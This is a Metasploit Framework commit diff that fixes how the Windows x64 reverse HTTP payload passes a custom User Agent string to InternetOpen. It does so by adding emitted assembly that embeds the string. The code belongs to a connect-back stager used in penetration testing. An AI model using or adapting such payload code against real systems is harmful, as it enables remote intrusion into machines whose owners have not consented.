Landing rapid7#19726, fixed incorrect processing of HTTP User Agent parameter in x64 reverse HTTP payload (Windows)

msutovsky-r7 · msutovsky-r7 · commit ebf73798a889 · 2024-12-16T10:11:32.000+01:00
diff --git a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
@@ -62,7 +62,7 @@ def generate(opts={})
       # Otherwise default to small URIs
       conf[:url]        = luri + generate_small_uri
     end
-
+  
     generate_reverse_http(conf)
   end
 
@@ -168,6 +168,7 @@ def asm_generate_ascii_array(str)
   # @option opts [String] :url The URI to request during staging
   # @option opts [String] :host The host to connect to
   # @option opts [Integer] :port The port to connect to
+  # @option opts [String] :ua The User Agent the payload will use
   # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
   # @option opts [String] :proxy_host The optional proxy server host to use
   # @option opts [Integer] :proxy_port The optional proxy server port to use
@@ -245,9 +246,21 @@ def asm_reverse_http(opts={})
       internetopen:
         push rbx                      ; stack alignment
         push rbx                      ; NULL pointer
-        mov rcx, rsp                  ; lpszAgent ("")
     ^
 
+    if opts[:ua]
+      asm << %Q^
+        call load_useragent
+        db"#{opts[:ua]}", 0x00
+      load_useragent:
+        pop rcx                         ; lpszAgent (stack pointer)
+      ^
+    else
+      asm << %Q^
+        mov rcx, rsp                    ; lpszAgent("")
+      ^
+    end
+
     if proxy_enabled
       asm << %Q^
         push 3
